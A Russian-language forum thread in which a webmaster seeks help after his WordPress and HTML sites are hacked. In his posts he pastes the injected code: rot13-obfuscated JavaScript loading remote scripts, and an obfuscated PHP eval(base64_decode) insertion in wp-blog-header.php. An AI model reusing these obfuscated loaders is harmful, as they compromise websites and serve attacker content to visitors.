Новая тема   Ответить

 X-dream
Повесли мне на блоги ихнее гавно. Как избавится?


ps - TrafficRevenue.net тут не причем.

Последний раз редактировалось: X-dream (17/02/12 в 08:13), всего редактировалось 1 раз

 X-dream
на dreamhost мля....во всех блогах
<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://jjj.genssvperirahr.arg/ybnqnq.wf?hfreanzr=vaw\"></fpevcg>\n<fpevcg fep=\"uggc://jjj.nyynop.pbz/vaqrk.cuc?ers=pbqr\"></fpevcg>"));</script>такая хрень...

 X-dream
в эти файлы был добавлен такой код:

readme.html
<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body>
quickstart.html
<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body><script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg fep=\"uggc://uq-kkkcbeabf.pbz/jc-pbagrag/cyhtvaf/pbag.cuc\"></fpevcg>"));</script></body>
wp-blog-header.php
<?php ${"\x47\x4c\x4fB\x41L\x53"}["\x67\x64pj\x65\x71dn\x66o"]="\x77\x70\x5f\x64\x69d\x5f\x68ead\x65\x72";if(!isset(${${"GL\x4f\x42\x41\x4cS"}["\x67\x64\x70\x6a\x65q\x64\x6e\x66o"]})){${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x67\x64\x70\x6a\x65\x71\x64n\x66\x6f"]}=true;require_once(dirname(__FILE__)."\x2fwp-\x6c\x6fad\x2ep\x68\x70");wp();require_once(ABSPATH.WPINC."\x2f\x74\x65m\x70\x6c\x61\x74\x65\x2d\x6coa\x64e\x72\x2e\x70hp");}eval(base64_decode("JGYgP\x53\x41\x69a\x48R0\x63D\x6f\x76\x4c\x32Ny\x64i\x35\x6aYy9\x6a\x59\x79\x38\x2fYz0i\x4ci\x52fU0\x56S\x56k\x56\x53\x57\x79\x64\x53RU1PV\x45\x56fQUR\x45\x55\x69\x64\x64O\x77\x6fkY\x79\x419I\x47\x5ap\x62G\x55\x6fJ\x47Yp\x4f\x77\x70lY\x32\x68vI\x43RjWzB\x64\x4f\x77=\x3d"));
?>
вот с wp-blog-header не понятно...

 X-dream
так же wp-admin/tools.php изменен.
пиздец. исправляю файлы - не помогает.
вордпресс мля........сцука..надо в статику все переделывать.

 mr.Indi
в wp-blog-header.php вставил скорей всего зашифрованый ифрейм на сплойт.

 X-dream
так удаляю. востанавливаю оригинал, и не помогает.

 heavybit
По времени изменения файлы поищи, найдешь что правили.

Последний раз редактировалось: heavybit (11/02/12 в 05:37), всего редактировалось 1 раз

 X-dream
это не только вордпресс...... вообще суки все сайты ломанули. везде эта хрень

 X-dream
сменил пароль от хостинга..отменил ssh и sftp только ftp оставил...хз поможет нет.. надо все чистить...бля , все html файлы и переносить нахрен от туда на дедик.

 X-dream
может кто подскажет софт чтоб на сервере все файлы прочекал и этот код удалил? а то руками работы на месяц мля...

ps -хз как ломанули. из скриптов стояли только вордпрессы tp и at3 (браузер google chrom)

Последний раз редактировалось: X-dream (12/02/12 в 05:50), всего редактировалось 1 раз

 heavybit
Или затроянили и увели пасс, или через wp.

 heavybit
X-dream писал:
Странные какие-то выводы, от чего должно помочь отключение ssh/sftp? Все iframer'ы через ftp работают.

 X-dream
похрен. я в железе не понимаю.

купил дедик за сотню с нормальным сапортом. все туда переношу уже...

всё. нах. никаких больше виртуалов vps и дримхостов.

 X-dream
на сервер только с моих ип заходили...

аваст бесплатный говорит все чисто

походу или вп или тп или ат3 или комп мне опять ломанули суки второй раз неделю. попробую проапгрейтить все что можно.

или сапорту это задание достанется...все почистить....пиздец 80 сайтов.

 heavybit
X-dream писал:
не стоит ему верить..

 karbonv
скорее это не вирус, просто дыра на вп есть через нее и ломанули, было похожее и у меня год назад где-то, теперь пользуюсь для защиты хитрыми редиректами если интересно стукни в аську расскажу что к чему, это просто... после того случая проблем подобных не наблюдал хотя шанс все же есть(

 Yacc
А вордпресс обновлялся?

 mr. snatch
Оффтопик: ога, тс себе троянов с торрентовых тайских полей наносил, а дримхост, TrafficRevenue и особенно ВП в читтерах оказались ))

 X-dream
бро. какие торренты. таких не знаю. никогда в жизни не юзал, еще со времен казы.

вордпрессы обновляются автоматом, плагины тоже обновленные все.

ps - пох. все к лучшему. за эти же деньги теперь сменил гавнохост на заточеный под ВП дедик с сапортом, а не с тупо мануалом.

да trafficrevenue для меня читеры - ихнии рабочии ломают и заражат сайты. а вп тут не причем. насчет дримхоста - ты там хостился хоть раз? если да то должен знать как у них память постоянно растет и какой саппорт отличный.

ps - бля , хорошо заметил вовремя. там 50 mfa с рекламой гугла.

и ваще...статика рулит.

Последний раз редактировалось: X-dream (12/02/12 в 06:55), всего редактировалось 1 раз

 X-dream
karbonv писал:

фаервол на сервере + 644 на темплейты - поможет? хотя именно темплейты и не тронули...

зы - сегодня завтра все переедет, стукнусь в аську

 X-dream
кстати чем бы комп проверить на троянов? а то опять формат придется делать ...

 mr. snatch
да чёт типа
cure IT Live CD
K Live CD
Virus Removal Tool

 SkyKiller
Братцы, а вы вообще про .ftpaccess когда-нибудь слышали?

 X-dream
.htaccess гдето встречал уже, а вот про это не знаю...

всё знать не возможно. я никогда железом и софтом который на сервере не заморачиваюсь ибо нихрена там не понимаю. для этого есть сапорт которому я исправно плачу уже 7 лет.

перенесут все уже сегодня я надеюсь, и почистят... закроют доступ по ip... и все будет ок.

а dreamhost - было выгодно лет 5-6 назад, галерки к хану постить с виртуала с анлим бандвич за 9 баксов в месяц.
как только они придумали VPS - можете почитать ихний форум.
я один из VPS на дримхосте полностью почистил от всего, пустой впс, перезагрузил, а он мне всеравно пишет памяти не хватает и надо добавить...

зы - а этот трафик ревенью мля... платят вроде по 3,5 за тысячу показов........... пиздец они на мне уже заработали.

реально получить с них мои деньги за рекламу? я серьёзно... нихуясе, рекламу мне повесили - пускай теперь платят!!

 X-dream
как наказать спонсора за то что ихнии рабочии ломают частную собственность и воруют деньги?

куда писать абузы и чем угрожать?